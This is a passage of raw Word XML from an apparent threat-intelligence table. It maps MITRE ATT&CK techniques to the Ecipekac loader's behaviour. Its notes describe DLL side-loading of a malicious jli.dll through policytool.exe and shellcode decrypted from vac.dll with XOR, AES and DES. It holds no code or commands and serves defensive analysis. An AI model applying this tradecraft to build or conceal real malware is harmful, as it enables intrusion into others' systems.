                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA21374" w14:textId="34C46F40" w:rsidR="00B7719C" w:rsidRDefault="006621ED" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56D10768" w14:textId="046D2E04" w:rsidR="00B7719C" w:rsidRPr="008D6D8A" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="09F248C1" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B57B13" w14:textId="0EA32D7F" w:rsidR="00175409" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="743F7465" w14:textId="38527DC3" w:rsidR="00175409" w:rsidRPr="00B857D7" w:rsidRDefault="006621ED"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4161477E" w14:textId="765517B2" w:rsidR="00175409" w:rsidRPr="00B857D7" w:rsidRDefault="006621ED" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1553.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C008FE7" w14:textId="397AFBBB" w:rsidR="00175409" w:rsidRDefault="006621ED" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9D76AC" w14:textId="77777777" w:rsidR="00175409" w:rsidRPr="00B857D7" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDE7196" w14:textId="77777777" w:rsidR="00175409" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23B85DD0" w14:textId="55B44FF6" w:rsidR="00175409" w:rsidRDefault="006621ED" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F3B1A0" w14:textId="1038CE42" w:rsidR="00175409" w:rsidRPr="008D6D8A" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="6B822FB2" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397649E8" w14:textId="70F5B165" w:rsidR="00175409" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09FE208C" w14:textId="4D098E84" w:rsidR="00175409" w:rsidRPr="00B857D7" w:rsidRDefault="006656F2"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2BD436D6" w14:textId="5EE2A1B3" w:rsidR="00175409" w:rsidRDefault="006656F2" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006656F2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1574.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006656F2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75335E5E" w14:textId="30C25F71" w:rsidR="006656F2" w:rsidRPr="006656F2" w:rsidRDefault="006656F2" w:rsidP="006656F2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB82F3D" w14:textId="34602779" w:rsidR="00175409" w:rsidRDefault="008B7D5D" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AF91101" w14:textId="77777777" w:rsidR="00175409" w:rsidRPr="00B857D7" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="100DFEAD" w14:textId="40962927" w:rsidR="00175409" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03EFE5E1" w14:textId="1D9E9C3B" w:rsidR="00175409" w:rsidRDefault="006656F2" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2552909A" w14:textId="77777777" w:rsidR="00175409" w:rsidRPr="008D6D8A" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00175409">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00175409">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ecipekac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00175409">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Layer I loader abuses policytool.exe, a legitimate application that is normally packaged in the IBM Development Package for Eclipse, to load a malicious DLL named ‘jli.dll’ in the current directory via the DLL side-loading technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B7719C" w:rsidRPr="00B857D7" w14:paraId="2021AFFA" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7698AC85" w14:textId="2E584224" w:rsidR="00B7719C" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A1F6592" w14:textId="19AF23C0" w:rsidR="00B7719C" w:rsidRPr="00B857D7" w:rsidRDefault="005F0E0E"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01888A9A" w14:textId="670E3E0C" w:rsidR="00B7719C" w:rsidRPr="00B857D7" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E39F362" w14:textId="286F50D7" w:rsidR="00B7719C" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="403AF4B5" w14:textId="77777777" w:rsidR="00B7719C" w:rsidRPr="00B857D7" w:rsidRDefault="00B7719C" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30CA9DBE" w14:textId="0AEE2990" w:rsidR="00B7719C" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681261A1" w14:textId="669A6DB1" w:rsidR="00B7719C" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24385500" w14:textId="62D51BE2" w:rsidR="00B7719C" w:rsidRPr="008D6D8A" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The layer I loader decrypts the layer II loader shellcode from the embedded data in ‘vac.dll’. Several crypto algorithms are used, such as XOR, AES and DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="7D0635BE" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58A97DC3" w14:textId="69FDA1BF" w:rsidR="005F0E0E" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="794A8C16" w14:textId="77777777" w:rsidR="005F0E0E" w:rsidRPr="00B857D7" w:rsidRDefault="005F0E0E"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3BED1790" w14:textId="7B02CD7C" w:rsidR="005F0E0E" w:rsidRPr="00B857D7" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11ADB4A0" w14:textId="77777777" w:rsidR="005F0E0E" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FF71246" w14:textId="77777777" w:rsidR="005F0E0E" w:rsidRPr="00B857D7" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5484F174" w14:textId="078AB065" w:rsidR="005F0E0E" w:rsidRDefault="00187FE6" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2FC9CF" w14:textId="4D09BA16" w:rsidR="005F0E0E" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435DB56F" w14:textId="77777777" w:rsidR="005F0E0E" w:rsidRPr="008D6D8A" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The layer I loader decrypts the layer II loader shellcode from the embedded data in ‘vac.dll’. Several crypto algorithms are used, such as XOR, AES and DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="3F957C33" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75183DAF" w14:textId="48593343" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E03464E" w14:textId="25C3D965" w:rsidR="00E610D9" w:rsidRPr="00B857D7" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EACEF30" w14:textId="7B1A508E" w:rsidR="00E610D9" w:rsidRPr="00B857D7" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B60B789" w14:textId="500D2722" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
